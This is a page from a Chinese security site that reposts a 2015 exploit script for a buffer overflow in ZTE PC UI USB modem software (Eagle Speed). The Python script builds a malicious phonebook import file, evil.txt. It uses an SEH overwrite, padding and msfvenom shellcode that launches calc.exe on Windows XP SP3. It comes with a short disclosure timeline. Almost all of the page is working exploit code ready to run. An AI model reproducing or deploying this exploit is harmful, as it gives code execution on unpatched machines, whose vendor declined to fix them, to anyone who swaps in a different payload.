首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>Exploits>文章内容 ZTE PC UI USB Modem Software - Buffer Overflow 来源：vfocus.net 作者：R-73eN 发布时间：2015-09-18   #!/usr/bin/python -w # Title : ZTE PC UI USB MODEM SOFTWARE Buffer Overflow # Date : 17/09/2015 # Author : R-73eN # Tested on : Windows Xp sp3 on software Eagle Speed PCW_EAGLEALBp671A1V1.0.0B02 # Since all the PC UI based software shares the same source code they are all vulnerable.(Confirmed By ZTE) # The problem exists into the import function at PhoneBook Menu which doesn't # validate data and importing a malformed file leads to code execution. # # Triggering the Vulnerability # run this python script which will save an evil.txt file. # Open Eagle Speed, go to PhoneBook , click Import and select the evil.txt File # A calculator Should pop up. # # Disclosure Timeline: # [16/08/2015] - Vendor notified # [18/08/2015] - Vendor Responded asking for more details # [17/08/2015] - Vendor Responded that will not release a patch since the product is at end of life. # # Solution: # Don't import unknown text file. # # Video - https://www.youtube.com/watch?v=jbv1L4TrHTY #   banner = "" banner +="  ___        __        ____                 _    _  \n" banner +=" |_ _|_ __  / _| ___  / ___| ___ _ __      / \  | |    \n" banner +="  | || '_ \| |_ / _ \| |  _ / _ \ '_ \    / _ \ | |    \n" banner +="  | || | | |  _| (_) | |_| |  __/ | | |  / ___ \| |___ \n" banner +=" |___|_| |_|_|  \___/ \____|\___|_| |_| /_/   \_\_____|\n\n" print banner   shellcode =  "" #msfvenom -p windows/exec cmd=calc.exe -f python -b "\x00\x0d\x0a\x3d\x20\x3f" shellcode += "\xba\x49\xc7\x99\xe5\xda\xd7\xd9\x74\x24\xf4\x5b\x29" shellcode += "\xc9\xb1\x31\x83\xc3\x04\x31\x53\x0f\x03\x53\x46\x25" shellcode += "\x6c\x19\xb0\x2b\x8f\xe2\x40\x4c\x19\x07\x71\x4c\x7d" shellcode += "\x43\x21\x7c\xf5\x01\xcd\xf7\x5b\xb2\x46\x75\x74\xb5" shellcode += "\xef\x30\xa2\xf8\xf0\x69\x96\x9b\x72\x70\xcb\x7b\x4b" shellcode += "\xbb\x1e\x7d\x8c\xa6\xd3\x2f\x45\xac\x46\xc0\xe2\xf8" shellcode += "\x5a\x6b\xb8\xed\xda\x88\x08\x0f\xca\x1e\x03\x56\xcc" shellcode += "\xa1\xc0\xe2\x45\xba\x05\xce\x1c\x31\xfd\xa4\x9e\x93" shellcode += "\xcc\x45\x0c\xda\xe1\xb7\x4c\x1a\xc5\x27\x3b\x52\x36" shellcode += "\xd5\x3c\xa1\x45\x01\xc8\x32\xed\xc2\x6a\x9f\x0c\x06" shellcode += "\xec\x54\x02\xe3\x7a\x32\x06\xf2\xaf\x48\x32\x7f\x4e" shellcode += "\x9f\xb3\x3b\x75\x3b\x98\x98\x14\x1a\x44\x4e\x28\x7c" shellcode += "\x27\x2f\x8c\xf6\xc5\x24\xbd\x54\x83\xbb\x33\xe3\xe1" shellcode += "\xbc\x4b\xec\x55\xd5\x7a\x67\x3a\xa2\x82\xa2\x7f\x5c" shellcode += "\xc9\xef\x29\xf5\x94\x65\x68\x98\x26\x50\xae\xa5\xa4" shellcode += "\x51\x4e\x52\xb4\x13\x4b\x1e\x72\xcf\x21\x0f\x17\xef" shellcode += "\x96\x30\x32\x8c\x79\xa3\xde\x7d\x1c\x43\x44\x82"   filename="evil.txt" nSEH = "\xEB\x06\x90\x90" SEH = "\xab\x11\x9f\x0f" buffer = "A" * 3136 + nSEH + SEH + shellcode + "D" * (2856 - len(shellcode)) textfile = open(filename , 'w') textfile.write(buffer) textfile.close() print "[+] Evil.txt created successfully [+]"   [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·CVE-2012-0217 Intel sysret exp ·Linux Kernel 2.6.32 Local Root ·Array Networks vxAG / xAPV Pri ·Novell NetIQ Privileged User M ·Array Networks vAPV / vxAG Cod ·Excel SLYK Format Parsing Buff ·PhpInclude.Worm - PHP Scripts ·Apache 2.2.0 - 2.2.11 Remote e ·VideoScript 3.0 <= 4.0.1.50 Of ·Yahoo! Messenger Webcam 8.1 Ac ·Family Connections <= 1.8.2 Re ·Joomla Component EasyBook 1.1   相关文章 ·IKEView.exe R60 - .elg Local S ·IKEView R60 - Buffer Overflow ·ManageEngine OpManager Remote ·VBox Satellite Express 2.3.17. ·MS15-078 Microsoft Windows Fon ·Android libstagefright - Integ ·CMS Bolt File Upload Vulnerabi ·Konica Minolta FTP Utility 1.0 ·MS15-100 Microsoft Windows Med ·Wireshark 1.12.7 - Division by ·TP-Link NC200/NC220 Cloud Came ·Total Commander 8.52 - Buffer   推荐广告

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved